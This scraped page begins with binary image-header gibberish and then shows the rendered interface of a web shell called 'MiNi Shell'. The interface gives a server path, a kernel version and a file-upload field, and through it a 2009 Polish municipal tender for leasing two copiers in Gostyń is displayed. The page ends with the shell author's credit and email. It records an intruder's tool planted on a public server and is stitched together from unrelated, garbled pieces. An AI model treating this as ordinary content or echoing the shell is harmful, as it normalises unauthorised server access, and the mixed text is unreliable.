JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/65507-N-2009.html

<p class="kh_header"><b>Gostyń: Dzierżawa dwóch kopiarek cyfrowych w okresie od 01.07.2009 r. do 30.06.2012 r.
(36 miesięcy)</b><br>
<b>Numer ogłoszenia: 65507 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gostyń, reprezentowana przez Burmistrza Gostynia , ul. Rynek 2, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5752110-13, faks 065 5752142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa dwóch kopiarek cyfrowych w okresie od 01.07.2009 r. do 30.06.2012 r.
(36 miesięcy).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dzierżawa dwóch kopiarek cyfrowych w okresie od 01.07.2009 r. do 30.06.2012 r. 
(36 miesięcy);
Określenie przedmiotu zamówienia

Przedmiotem zamówienia jest wydzierżawienie dwóch nowych kopiarek cyfrowych na potrzeby Urzędu Miejskiego w Gostyniu; (miejsce świadczenia usługi: Rynek 2 - 1 szt., ul. Wrocławska 256 - 1 szt.).

Wymagania w zakresie sprzętu:
1.	Technologia cyfrowa, laserowa.
2.	Format oryginału - A5-A3.
3.	Format kopii - A5-A3.
4.	Prędkość kopiowania/drukowania - co najmniej 45 kopii/min. przy kopiowaniu/drukowaniu jednostronnym A4.
5.	Automatyczny 2-stronny podajnik oryginałów.
6.	Duplex (automatyczne drukowanie dwustronne)
7.	Pamięć RAM kopiarki min. 256 MB
8.	Obsługa protokołu TCP/IP
9.	Obsługa języka PCL6
10.	Możliwość drukowania sieciowego.
11.	Możliwość skanowania sieciowego do serwera FTP w formie plików PDF lub TIF (TIFF)
12.	Możliwość jednoczesnego napełnienia kaset:
a.	papierem formatu A4 - min. 500 arkuszy,
b.	papierem formatu A3 - min. 500 arkuszy.
13.	Stolik pod kopiarkę.
14.	Dotykowy panel sterujący w języku polskim.
15.	Sterowniki drukarki w języku polskim dedykowane dla systemów WinXP i Win2003
16.	Możliwość zarządzania zdalnego przez lokalną sieć komputerową.

Dodatkowe warunki zamawiającego:
1.	Urządzenie będące przedmiotem dzierżawy musi być urządzeniem nowym, nigdzie wcześniej nieeksploatowanym;
2.	Zamawiający wymaga m.in. skonfigurowania urządzeń w lokalnej sieci komputerowej (konfiguracja TCP/IP i klienta FTP);

Zamawiający dopuszcza możliwość składania ofert równoważnych w zakresie parametrów technicznych oferowanego sprzętu, z zastrzeżeniem, że proponowane urządzenia winny spełniać wymagania techniczne, funkcjonalne i jakościowe, co najmniej takie jak wskazane w niniejszym ogłoszeniu lub lepsze..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.52.10.00-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wniesienie wadium będzie wymagane po otrzymaniu zaproszenia do udziału w licytacji elektronicznej, przed terminem jej otwarcia;
(szczegółowe informacje w tym zakresie zostaną zawarte w zaproszeniu; wysokość wadium: 1 500 zł; słownie: tysiąc pięćset złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy nie wykluczeni na podstawie art. 24, spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz następujące wymagania:
1. posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w zakresie odpowiadającym przedmiotowi zamówienia;
2. posiadanie niezbędnej wiedzy i doświadczenia zawodowego oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, w szczególności: w ciągu ostatnich trzech lat (licząc do dnia wszczęcia postępowania) zrealizowali należycie co najmniej dwie tożsame usługi, świadczone przez okres min. 1 roku (lub doświadczenie równoważne polegające na wykonaniu jednej tożsamej usługi, świadczonej przez okres min. 2 lat);
3. znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. spełnienie wymagań określonych przez Zamawiającego;
Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy wymaganych dokumentów (niżej wymienionych)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z wnioskiem o dopuszczenie do udziału w postępowaniu (wzór wniosku dostępny na stronie www.bip.gostyn.pl) należy przedłożyć następujące oświadczenia i dokumenty, potwierdzające spełnienie wymaganych warunków udziału w postępowaniu:
1. oświadczenie o spełnieniu warunków udziału w postępowaniu - w formie oryginału (wzór oświadczenia dostępny na stronie www.bip.gostyn.pl);
2. pełnomocnictwo do reprezentowania firmy, jeśli dotyczy, a nie wynika ono z innych przedstawionych dokumentów (pełnomocnictwo winno być dołączone do wniosku w formie oryginału albo kopii poświadczonej przez notariusza za zgodność z oryginałem. Złożenie dokumentu pełnomocnictwa w postępowaniu o udzielenie zamówienia publicznego, nie podlega opłacie skarbowej);
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków - w formie kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem; 
4. wykaz wykonanych w ciągu ostatnich trzech lat usług, odpowiadających wymaganiom Zamawiającego, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że wymienione usługi zostały wykonane należycie (formularz  pn. Wykaz usług dostępny na stronie www.bip.gostyn.pl) - Wykaz usług w formie oryginału, natomiast dokumenty potwierdzające należyte wykonanie - w formie oryginału lub kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 40 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.bip.gostyn.pl/Zamowienia-publiczne/Z-ogloszeniem/LE-013-2009</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Rejestracja w systemie i identyfikacja wykonawców:

- Rejestracja jest warunkiem koniecznym do wzięcia udziału w licytacji - Wykonawca obowiązany jest dokonać rejestracji na platformie licytacyjnej zamieszczonej na stronie Urzędu Zamówień Publicznych http://licytacje.uzp.gov.pl
- w polu LOGIN należy wpisać dowolny wyraz, z tym, że musi on być unikatowy w całym systemie - służy on identyfikacji użytkownika w systemie,
- hasło - dowolny wyraz składający się z liter i cyfr,
- E-mail - adres poczty elektronicznej użytkownika - na ten adres zostanie wysłana wiadomość z linkiem aktywacyjnym; na ten adres będą również przekazywane wszystkie wiadomości z systemu,
- rola - wykonawca.
- System wymaga akceptacji regulaminu.
- Po dokonaniu rejestracji, na adres podany w formularzu rejestracyjnym zostanie wysłana wiadomość do administratora systemu; w wiadomości będzie zawarty link aktywacyjny, który należy uruchomić.
- Należy zapisać LOGIN oraz hasła - są niezbędne do zalogowania się do systemu 
(w przypadku utraty hasła będzie możliwe wygenerowanie nowego przy użyciu funkcji nie pamiętam hasła).
- W trakcie postępowania Wykonawca jest obowiązany przesłać swój LOGIN Zamawiającemu wraz z wnioskiem o dopuszczenie do udziału w postępowaniu; umożliwiający przypisanie wykonawcy do licytacji elektronicznej
(Uwaga: nie należy przesyłać swojego hasła Zamawiającemu, nie należy też udostępniać hasła osobom nieuprawnionym).

Wymagania techniczne urządzeń informatycznych:
- Wymagania systemu: komputer klasy PC z systemem operacyjnym Windows lub Linux z dostępem do Internetu.
- System licytacji elektronicznej nie ma szczególnych wymagań technicznych w zakresie sprzętu komputerowego (każdy komputer umożliwiający przeglądanie stron internetowych jest wystarczający do obsługi platformy, niezależnie od parametrów technicznych) jak również w zakresie prędkości łącza internetowego.
- System może zostać uruchomiony z wykorzystaniem większości przeglądarek internetowych, jednak testy zostały przeprowadzone przez Urząd Zamówień Publicznych dla następujących przeglądarek:
- Mozilla Firefox w wersji 2.0 i 3.0
- Internet Explorer w wersji 6.0 i 7.0
(Urząd Zamówień Publicznych proponuje przed rozpoczęciem korzystania z platformy upewnić się, jaką przeglądarką internetową dysponuje użytkownik);.</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> Sposób postępowania w toku licytacji elektronicznej:
1)	oferty składane w formie elektronicznej nie muszą być opatrzone bezpiecznym podpisem elektronicznym;
2)	informacje o liczbie etapów licytacji elektronicznej - licytacja jest jednoetapowa;
3)	przypisanie do licytacji - oprócz zaproszenia do udziału w licytacji - przekazanego faksem, wykonawca zostanie przypisany do przedmiotowej licytacji (po uprzednim wniesieniu wadium; szczegółowe informacje w tym zakresie zostaną zawarte w zaproszeniu)
- fakt przekazania zaproszeń zostanie zaznaczony na platformie (za przekazanie uznaje się doręczenie zaproszenia wykonawcy; w przypadku, gdy przekazanie zaproszeń odbywa się w różnym czasie w stosunku do poszczególnych wykonawców, za termin przekazania zaproszeń uznaje się przekazanie zaproszenia ostatniemu z wykonawców dopuszczonych do postępowania); 
4)	termin otwarcia licytacji -  15.05.2009 r., o godz. 10:00;
5)	informacja o czasie trwania licytacji -  15.05.2009 r. od godz. 10:00 do godz. 12:00;
6)	cena wywoławcza - Zamawiający nie określa ceny wywoławczej; 
7)	sposób składania ofert w toku licytacji - za pomocą formularza umieszczonego na stronie internetowej (na platformie licytacyjnej zamieszczonej na stronie Urzędu Zamówień Publicznych), wykonawcy składają kolejne korzystniejsze oferty (postąpienia), podlegające automatycznej klasyfikacji na podstawie ceny;
8)	opis sposobu kalkulacji ceny ofertowej: propozycje kolejnych korzystniejszych ofert (postąpień) należy ustalić na podstawie kalkulacji własnej, biorąc pod uwagę przedmiot zamówienia;
9)	w kalkulacji ceny (brutto) w całym okresie trwania dzierżawy należy uwzględnić łącznie wszystkie koszty związane z realizacją zamówienia, w tym m.in.:
(a)	podatek (VAT);
(b)	cenę miesięcznej dzierżawy dwóch urządzeń x 36 m-cy
(c)	ceny jednostkowe jednostronnej kopii A4 - przy kalkulacji ceny należy założyć, że zamawiający będzie wykonywał:
- na jednej kopiarce cyfrowej ok. 250 000 kopii rocznie, 
- na drugiej kopiarce cyfrowej ok. 200 000 kopii rocznie,
- odpowiednio w 3-letnim okresie realizacji umowy ok. 1 350 000 kopii;
(d)	wszelkie koszty eksploatacji urządzeń w okresie dzierżawy w szczególności: koszty tonerów, elementów wymiennych w normalnym cyklu pracy urządzeń, kosztów serwisowych oraz wszelkich napraw niewynikających z winy zamawiającego;
	- usługa nie obejmuje kosztu papieru;
(e)	w okresie realizacji umowy cena nie będzie podlegać waloryzacji - przy kalkulacji ceny należy uwzględnić ewentualne wskaźniki wzrostu ceny;
(f)	w cenie należy uwzględnić koszt: dostawy sprzętu na miejsce (Rynek 2 - jedna kopiarka, ul. Wrocławska 256 - druga kopiarka), montażu wraz z uruchomieniem sprzętu, pełnej konfiguracji w lokalnej sieci komputerowej oraz szkolenia administratorów systemu (2 osoby);
(g)	minimalna wysokość postąpienia - nie mniej niż 100.00 zł brutto (kwota, o którą można pomniejszyć kolejną składana ofertę, liczona od oferty najkorzystniejszej); 
sposób podawania kwoty - kwota określana jest w złotych oraz groszach (jeżeli występują grosze, wpisujemy je po kropce, np.: 105.50; obowiązuje dokładność do dwóch miejsc po kropce); 
Złożona oferta:
- nie może być mniej korzystna niż oferta najkorzystniejsza,
- musi być niższa przynajmniej o kwotę minimalnego postąpienia,
- wykonawca nie może cofnąć raz złożonej oferty (prosimy o uważne wpisywanie oferowanych kwot i sprawdzanie ich przed naciśnięciem przycisku: złóż postąpienie);
System nie przyjmie oferty złożonej niezgodnie z warunkami opisanymi powyżej;
W celu zapewnienia aktualności listy postąpień  niezbędne będzie samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej - system nie dokonuje odświeżania automatycznie;
10)	waluta - PLN; propozycje cenowe należy podawać (brutto) w złotych polskich, 
z dokładnością do dwóch miejsc po kropce;
11)	od momentu otwarcia do momentu zamknięcia licytacji, Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną;
12)	do momentu zamknięcia licytacji Zamawiający nie ujawnia informacji umożliwiającej identyfikację Wykonawców;
13)	warunki zamknięcia licytacji elektronicznej - licytacja zostanie zamknięta 15.05.2009 r.
o godz. 12:00, w momencie zamknięcia licytacji wyłączona zostanie możliwość składania postąpień;
14)	po zamknięciu licytacji na ekranie przedstawiającym ogłoszenie o zamówieniu zostanie ujawniony wykonawca, który złożył najkorzystniejszą ofertę;

15)	Wykonawca, który złoży najkorzystniejszą ofertę, niezwłocznie prześle Zamawiającemu (faksem) opis oferowanego urządzenia z wyszczególnieniem parametrów technicznych, (marka model, symbol urządzenia, opcje urządzenia) oraz szczegółową kalkulację zaoferowanej ceny, z wyodrębnieniem kosztów dzierżawy urządzeń (brutto) i kosztów wykonania jednej kopii  jednostronnie, format A4 (brutto);.</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">w wyznaczonym dniu od godz. 10:00 do godz. 12:00</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> tak.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 05.05.2009 godzina 12:00, miejsce: Wniosek należy przesłać na adres: Urząd Miejski w Gostyniu, Rynek 2, 63-800 Gostyń (sekretariat) lub składać w Wydziale Organizacyjnym Urzędu Miejskiego, ul. Wrocławska 256, pok. nr 8 lub 9..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 15/05/2009 od godz. 10:00.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> 15/05/2009 o godz. 12:00.</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> warunki zamknięcia licytacji elektronicznej - licytacja zostanie zamknięta 15/05/2009 r.
o godz. 12:00, w momencie zamknięcia licytacji wyłączona zostanie możliwość składania postąpień;.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wszelkie przyszłe zobowiązania i warunki wymagane przez Zamawiającego określa projekt umowy, który dostępny jest na stronie:

Creat By MiNi SheLL
Email: jattceo@gmail.com